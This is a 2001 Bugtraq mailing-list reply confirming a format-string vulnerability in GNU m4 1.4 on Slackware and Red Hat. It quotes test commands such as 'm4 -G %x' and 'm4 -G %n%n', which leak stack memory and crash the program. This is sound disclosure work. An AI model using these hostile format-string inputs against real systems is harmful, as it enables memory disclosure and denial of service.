[19087] in bugtraq
Re: m4 (GNU) Buffer Overflow, Slackware Confirmed
daemon@ATHENA.MIT.EDU (honoriak)
Thu Feb 8 17:55:43 2001
MIME-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit
Message-ID: <3A831CF1.6DFCF6DD@argen.net>
Date: Thu, 8 Feb 2001 23:25:53 +0100
Reply-To: honoriak <EGC@ARGEN.NET>
From: honoriak <EGC@ARGEN.NET>
To: BUGTRAQ@SECURITYFOCUS.COM
Avro Nelson wrote:
> The problem exists in the Slackware x86 7.1.0 Distro as well.
> >On Fre, Feb 02, 2001 at 09:36:29 +0100, Tomasz Kužniar wrote:
> >> The same problem in most (all?) distributions is with m4 - GNU macro
> >> processor code, when trying use -G option:
> >>
> >> mezon@beata:~$ m4 -G %x%x%x%x
> >> m4: 40012a48380491e00: No such file or directory
> Confirmed for Slackware Linux 7.1.0
> aanelson@Boxy:/etc$ m4 -G %x
> m4: 400fe9b4: No such file or directory
> aanelson@Boxy:/etc$ m4 -G %qx
> m4: 4000aa70400fe9b4: No such file or directory
> aanelson@Boxy:/etc$ m4 %x
> m4: 400fe9b4: No such file or directory
> aanelson@Boxy:/# m4 --version
> GNU m4 1.4
rh 6.1 is also vulnerable..:
[h@honorato perl-buffer]$ m4 -G %x
m4: 4010848c: No such file or directory
[h@honorato perl-buffer]$ m4 -G %qx
m4: 4000a6104010848c: No such file or directory
[h@honorato perl-buffer]$ m4 -G %n%n
m4: Segmentation fault (core dumped)
[h@honorato perl-buffer]$ m4 --version
GNU m4 1.4
-honoriak
helisec inc.
>
>
> _________________________
> www.estec.com
> _________________________
